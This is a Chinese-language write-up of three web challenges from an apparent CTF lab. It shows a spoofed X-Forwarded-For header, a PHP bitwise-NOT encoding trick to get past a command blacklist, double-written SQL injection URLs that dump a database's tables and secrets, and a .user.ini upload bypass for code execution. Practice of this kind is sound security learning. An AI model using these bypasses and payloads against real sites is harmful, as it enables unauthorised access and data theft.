HNU1.31测试wp

一、Welcome To HnuSec

首先进入靶场

img

发现没有可以交互的地方

首先查看网页源代码

img

发现需要用本地用户才能登入

这里就要在请求包中加入

X-Forwarded-For:127.0.0.1

让服务器认为请求访问的是本地用户

img

收到返回包

img

访问这个地址

img

通过代码审计我们需要用get上传一个code

但是题目ban掉了

tac|cat|more|cp|touch|tee|system| |flag

这些代码

这里我们需要绕过这些禁用

这里我再网上找到了一个URL的脚本,可以先对想要输入的内容在电脑上进行URL编码进行绕过

编码的程序是这样的

<?php error_reporting(0); $a='system'; $b=urlencode(~$a); echo $b; echo " "; $c='ls /'; $d=urlencode(~$c); echo $d;

按理说要上传

img

这样一句话,但是system被ban了所以我们使用脚本

在php在线上跑我的脚本

img

右边就是system(‘ls /’)被url编码后的代码

我们将编码后的代码取反再上传就可以得到以下回显

img

发现有Linux的根目录

发现有flag文件

这时就要访问flag文件,但是flag和cat都被ban了,所以继续使用脚本

只需要将这里进行修改,其他操作都一样

img

重新上传,就可以得到flag

img

二、Wonderful SQL

这里需要我们进行爆破

img

img

img

得到密码:账号:HnuSec 密码:HnuSec5555Winter

img

看到提示:

img

需要在/AdMiNi_HeR3 传入id参数

img

img

有过滤,union这里需要改为uunionnion

查数据库:http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,database(),3%23

Wonderful

wonderful

查表:secret,user

这里information里的or过滤了所以要改为infoorrmation

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema=database()%23

查字段:name,value

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='secret'%23

查对应字段:flag,flag_here

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(name),3 from secret%23

查value字段对应的值,value被过滤,双写vvaluealue

http://114.116.119.253:30015/AdMiNi_HeR3?id=-1%27)uunionnion select 1,group_concat(vvaluealue),3 from secret%23

img

三、Short Uploader

文件上传,发现php后缀全部过滤,考虑用.user.ini方法

img

上传1.jpg,内容?><?=ls;

img

cat /flag

img

img